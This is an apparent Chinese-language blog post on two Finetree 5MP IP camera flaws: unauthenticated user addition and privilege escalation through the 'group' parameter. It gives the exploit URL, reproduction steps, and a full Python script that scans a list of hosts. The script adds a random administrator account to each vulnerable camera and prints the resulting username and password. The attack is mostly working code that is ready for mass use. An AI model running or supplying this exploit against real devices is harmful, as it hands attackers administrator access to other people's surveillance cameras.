文章详细介绍了Finetree5MP摄像机存在的两个安全问题:任意用户添加和未授权权限提升漏洞。提供了一个EXP链接用于复现任意用户添加漏洞,用户只需访问该链接即可执行添加操作。此外,文章还给出了一个Python脚本,用于批量测试设备是否存在这些漏洞,通过POST请求修改用户组参数实现权限提升。该脚本检测到200响应码时会报告新添加的用户信息。
EXP:http://ip:port/quicksetup/user_pop.php?method=add
Finetree 5MP 摄像机任意用户添加漏洞
漏洞复现
登录界面
使用exp,访问未授权的用户添加页面,进行任意用户添加操作,添加会出现报错不用管,直接返回后台登录即可
http://ip:port/quicksetup/user_pop.php?method=add
Finetree 5MP 未授权权限提升漏洞
漏洞复现
使用exp添加用户并抓包,修改 ‘group=’ 参数值,放行请求包即可完成低用户提升为管理员用户
group是组,1代表guest,2是operator,3是administrator
批量测试POC
#!/usr/bin/env python
# -*- conding:utf-8 -*-
# Finetree 5MP 摄像机任意用户添加
import requests
import argparse
import sys
import urllib3
import random
import threading
urllib3.disable_warnings()
def title():
print("""
_____ _ _ __ __ _____ ___ ___ ___ __ _ _ ___ ____ ______ ___
/ ____|| \ | |\ \ / /| __ \ |__ \ / _ \ |__ \ /_ | | || | |__ \ |___ \ |____ ||__ \
| | | \| | \ \ / / | | | | ______ ) || | | | ) | | | ______ | || |_ ) | __) | / / ) |
| | | . ` | \ \/ / | | | ||______| / / | | | | / / | ||______||__ _| / / |__ < / / / /
| |____ | |\ | \ / | |__| | / /_ | |_| | / /_ | | | | / /_ ___) | / / / /_
\_____||_| \_| \/ |_____/ |____| \___/ |____| |_| |_| |____||____/ /_/ |____|
Author:Henry4E36
""")
class information(object):
def __init__(self,args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
payload = self.url + "/quicksetup/user_update.php"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
"Content-Type": "application/x-www-form-urlencoded"
}
username = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",8))
passwd = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.1234567890!@#",8))
data = f"method=add&user={username}&pwd={passwd}&group=3&ptz_enable=0" # 1.访客 2.操作者 3.管理员
try:
res = requests.post(url=payload, headers=headers, data=data, verify=False, timeout=5)
if res.status_code == 200 and "200" in res.text:
print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在任意用户添加!\033[0m")
print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码: {passwd} \033[0m")
print("[" + "-"*100 + "]")
elif res.status_code == 200 and "804" in res.text:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户重复!")
print("[" + "-"*100 + "]")
elif res.status_code == 200 and "802" in res.text:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户满了!")
print("[" + "-"*100 + "]")
else:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在任意用户添加!")
print("[" + "-"*100 + "]")
except Exception as e:
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
def file_url(self):
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
information.target_url(self)
if __name__ == "__main__":
title()
parser = argparse.ArgumentParser(description='Finetree 5MP 摄像机任意用户添加')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 CNVD-2021-42372.py -u http://127.0.0.1 \neg2:>>>python3 CNVD-2021-42372 -f ip.txt")
elif args.url:
information(args).target_url()
elif args.file:
information(args).file_url()
扫一扫
878
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
